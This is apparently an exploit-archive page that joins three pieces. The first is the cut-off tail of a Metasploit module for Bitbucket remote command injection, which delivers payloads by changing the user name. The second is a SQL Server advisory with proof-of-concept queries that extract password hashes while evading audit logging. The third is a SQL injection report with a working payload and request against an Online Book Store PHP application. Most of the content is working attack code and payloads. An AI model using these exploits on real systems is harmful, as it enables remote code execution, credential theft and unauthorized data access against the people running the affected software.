'GET',      'uri' => commit_diff_uri,      'keep_cookies' => true,      'vars_get' => { 'since' => first_commit_sha }    )  end  def delete_repository(username)    vprint_status("Attempting to delete repository '#{@repo_name}'")    repo_uri = normalize_uri(target_uri.path, 'projects', @project_key, 'repos', @repo_name.downcase)    res = send_request_cgi(      'method' => 'DELETE',      'uri' => repo_uri,      'keep_cookies' => true,      'headers' => {        'X-AUSERNAME' => username,        'X-AUSERID' => @user_id,        'X-Requested-With' => 'XMLHttpRequest',        'Origin' => "#{ssl ? 'https' : 'http'}://#{peer}",        'ctype' => 'application/json',        'Accept' => 'application/json, text/javascript'      }    )    unless res&.body&.include?('scheduled for deletion')      print_warning('Failed to delete repository')      return    end    print_good('Repository has been deleted')  end  def delete_project(username)    vprint_status("Now attempting to delete project '#{@project_name}'")    send_request_cgi( # fails to return a response      'method' => 'DELETE',      'uri' => normalize_uri(target_uri.path, 'projects', @project_key),      'keep_cookies' => true,      'headers' => {        'X-AUSERNAME' => username,        'X-AUSERID' => @user_id,        'X-Requested-With' => 'XMLHttpRequest',        'Origin' => "#{ssl ? 'https' : 'http'}://#{peer}",        'Referer' => "#{ssl ? 'https' : 'http'}://#{peer}/projects/#{@project_key}/settings",        'ctype' => 'application/json',        'Accept' => 'application/json, text/javascript, */*; q=0.01',        'Accept-Encoding' => 'gzip, deflate'      }    )    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'projects', @project_key),      'keep_cookies' => true    )    unless res&.code == 404      print_warning('Failed to delete project')      return    end    print_good('Project has been deleted')  end  def get_repo    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'rest/api/latest/repos'),      'keep_cookies' => true    )    unless res      print_status('Couldn\'t access repos page. Will create repo')      return []    end    json_data = JSON.parse(res.body)    unless json_data && json_data['size'] >= 1      print_status('No accessible repositories. Will attempt to create a repo')      return []    end    repo_data = json_data['values'].first    repo_name = repo_data['slug']    project_key = repo_data['project']['key']    unless repo_name && project_key      print_status('Could not find repo name and key. Creating repo')      return []    end    [ repo_name, project_key ]  end  def get_repo_info    unless @project_name && @project_key      print_status('Failed to find valid project information. Will attempt to create repo')      return nil    end    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri('projects', @project_key, 'repos', @project_name, 'commits'),      'keep_cookies' => true    )    unless res      print_status("Failed to access existing repository #{@project_name}")      return nil    end    html_doc = res.get_html_document    commit_data = html_doc.search('a[@class="commitid"]')    unless commit_data && commit_data.length > 1      print_status('No commits found for existing repo')      return nil    end    latest_commit = commit_data[0]['data-commitid']    prev_commit = commit_data[1]['data-commitid']    file_uri = normalize_uri(commit_uri(@project_key, @project_name, latest_commit), 'changes')    res = send_request_cgi(      'method' => 'GET',      'uri' => file_uri,      'keep_cookies' => true    )    return nil unless res    json = JSON.parse(res.body)    return nil unless json['values']    path = json['values']&.first&.dig('path')    return nil unless path    [ latest_commit, prev_commit, path['name'] ]  end  def exploit    @use_public_repo = true    datastore['GIT_USERNAME'] = datastore['USERNAME']    datastore['GIT_PASSWORD'] = datastore['PASSWORD']    if datastore['USERNAME'].blank? && datastore['PASSWORD'].blank?      fail_with(Failure::BadConfig, 'No credentials to log in with.')    end    log_in(datastore['USERNAME'], datastore['PASSWORD'])    @curr_uname = datastore['USERNAME']    @project_name, @project_key = get_repo    @repo_name = @project_name    @latest_commit, @first_commit, @diff_file = get_repo_info    unless @latest_commit && @first_commit && @diff_file      @use_public_repo = false      @project_name, @project_key = create_project      email, @repo_name = create_repository      @latest_commit, @first_commit, @diff_file = create_commits(email)      print_good("Commits added: #{@first_commit}, #{@latest_commit}")    end    print_status('Sending payload')    case target['Type']    when :win_dropper      execute_cmdstager(linemax: target['MaxLineChars'] - uname_payload('cmd.exe /c ').length, noconcat: true, temp: '.')    when :linux_dropper      execute_cmdstager(linemax: target['MaxLineChars'], noconcat: true)    when :unix_cmd      execute_command(payload.encoded.strip)    end  end  def cleanup    if @curr_uname != datastore['USERNAME']      print_status("Changing user name back to '#{datastore['USERNAME']}'")      if change_username(@curr_uname, datastore['USERNAME'])        @curr_uname = datastore['USERNAME']      else        print_warning('User name is still set to payload.' \                      "Please manually change the user name back to #{datastore['USERNAME']}")      end    end    unless @use_public_repo      delete_repository(@curr_uname) if @repo_name      delete_project(@curr_uname) if @project_name    end  end  def execute_command(cmd, _opts = {})    if target['Platform'] == 'win'      curr_payload = (cmd.ends_with?('.exe') ? uname_payload("cmd.exe /c #{cmd}") : uname_payload(cmd))    else      curr_payload = uname_payload(cmd)    end    unless change_username(@curr_uname, curr_payload)      fail_with(Failure::UnexpectedReply, 'Failed to change user name to payload')    end    view_commit_diff(@latest_commit, @first_commit, @diff_file)    @curr_uname = curr_payload  endend

Bitbucket Environment Variable Remote Command Injection

Microsoft SQL Server 2014, 2016, 2017, 2019, and 2022 appears to ignore audit rules for sys.sysxlgns allowing an attacker with administrative permissions to extract password hashes under the radar. Microsoft told the researcher they are not willing to fix it but acknowledge it as a security problem.

Title: Microsoft SQL Server Password Hash Exposure  
Product:                   Database  
Manufacturer:              Microsoft   
Affected Version(s):       2012-2022  
Risk Level:                Medium  
CVE Reference:             N/A  
Author of Advisory:        Emad Al-Mousa

Overview:

SQL Server is a popular database system, and database systems are a vital backbone in IT infrastructure as different types of systems and applications will require back-end data-store (databsae system). Moreover, Password hashes for Local database accounts are restricted in terms of permission access and only system admins/ DBA's can access them. of course, attackers will attempt to access them to crack the hashes and access the database system for data exfiltration.

*****************************************  
Vulnerability Details:

The following exploit assumes attacker escalated his permission as admin, and he/she will be able extract the password hashes even though an audit is in-place. So, its an audit by pass vulnerability.

currently, SQL Server password hashes are stored in two tables:

sys.sql_logins ----> visible table and auditing can be configured against it

 sys.sysxlgns  -----> invisible table and requires special access mode and audit rule is not functional !

*****************************************  
Proof of Concept (PoC):

I will simulate a way to extract password hashes in a stealthy way (auditing will not capture it), in the following PoC the account is called dodo:

Accessing windows server as administrator, open CMD session using the following command:

sqlcmd -S localhost\MSSQL2019 -A -E

USE [master]

GO

select name,pwdhash from sys.sysxlgns where name='dodo';

GO

The password hashes for account “dodo” will be displayed.

Let us create an audit rule using this method to capture “select” statements executed against sys.sysxlgns :

I will create a server-level audit to push audit logs as “binary file”:

USE [master]  
GO  
CREATE SERVER AUDIT [Audit-2020-SYSTEM-TABLE]  
TO FILE  
( FILEPATH = N’D:\mssq_audit\’  
,MAXSIZE = 0 MB  
,MAX_ROLLOVER_FILES = 2147483647  
,RESERVE_DISK_SPACE = OFF  
)  
WITH  
( QUEUE_DELAY = 1000  
,ON_FAILURE = CONTINUE  
,AUDIT_GUID = ‘0333dfad-260b-45a4-8302-d7eb94c14cdc’  
)  
ALTER SERVER AUDIT [Audit-2020-SYSTEM-TABLE] WITH (STATE = ON)  
GO

Then, I will define a database level audit under “MASTER” database to audit SELECT statement by any user/account against the system table sys.sysxlgns as follows:

sqlcmd -S localhost\MSSQL2019 -A -E

USE [master]

GO

CREATE DATABASE AUDIT SPECIFICATION [audit-systemtable]

FOR SERVER AUDIT [Audit-2020-SYSTEM-TABLE]

ADD (SELECT ON OBJECT::[sys].[sysxlgns] BY [public])

WITH (STATE = ON)

GO

The audit specification will be successfully created and can be visibly seen in SQL Server management studio.

Now you attempt to execute select statement again:

sqlcmd -S localhost\MSSQL2019 -A -E

USE [master]

GO

select name,pwdhash from sys.sysxlgns where name='dodo';

GO

- checking audit logs.....nothing is recorded !

Conclustion:

Super users and admin accounts must be monitored/audited for real-time monitoring for threat detection, and for future forensic analysis !

*****************************************  
- Defensive Techniques:

configure Operating System Security auditing and Monitoring.  
Network Segmentation and Firewall.  
pro-actively patch your systems and database systems.

*****************************************  
References:  
https://databasesecurityninja.wordpress.com/2020/06/02/extract-sql-server-database-password-hashes-without-a-trace/  
https://learn.microsoft.com/en-us/sql/relational-databases/system-tables/system-base-tables?view=sql-server-ver16

Microsoft SQL Server 2014 / 2016 / 2017 / 2019 / 2022 Audit Logging Failure

Online Book Store Project v1.0 is vulnerable to SQL Injection via /bookstore/bookPerPub.php.

Permalink

**Online Book Store Project v1.0 by itsourcecode.com has SQL injection**

**Vul\_Author:** Wenxun Wang

**vendors:** https://itsourcecode.com/free-projects/php-project/online-book-store-project-in-php-with-source-code/

**Vulnerability url:** /bookstore/bookPerPub.php?pubid=

**Vulnerability location:** /bookstore/bookPerPub.php

**\[+\] Payload:** /bookstore/bookPerPub.php?pubid=1'%20and%20(extractvalue('anything'%2cconcat('~'%2c(select%20database()))))%3b%23

​ Leak place : pubid

**Current database name:** bookstoredb

**Request package**：select book information by pubid

    GET /bookstore/bookPerPub.php?pubid=1'%20and%20(extractvalue('anything'%2cconcat('~'%2c(select%20database()))))%3b%23 HTTP/1.1
    Host: localhost
    sec-ch-ua: "-Not.A/Brand";v="8", "Chromium";v="102"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/bookstore/publisher_list.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=8it4g868ibt9g6r8ae4203tmkd
    Connection: close
    

**SQL injection result**：line 12 database name is displayed.

Tag

#windows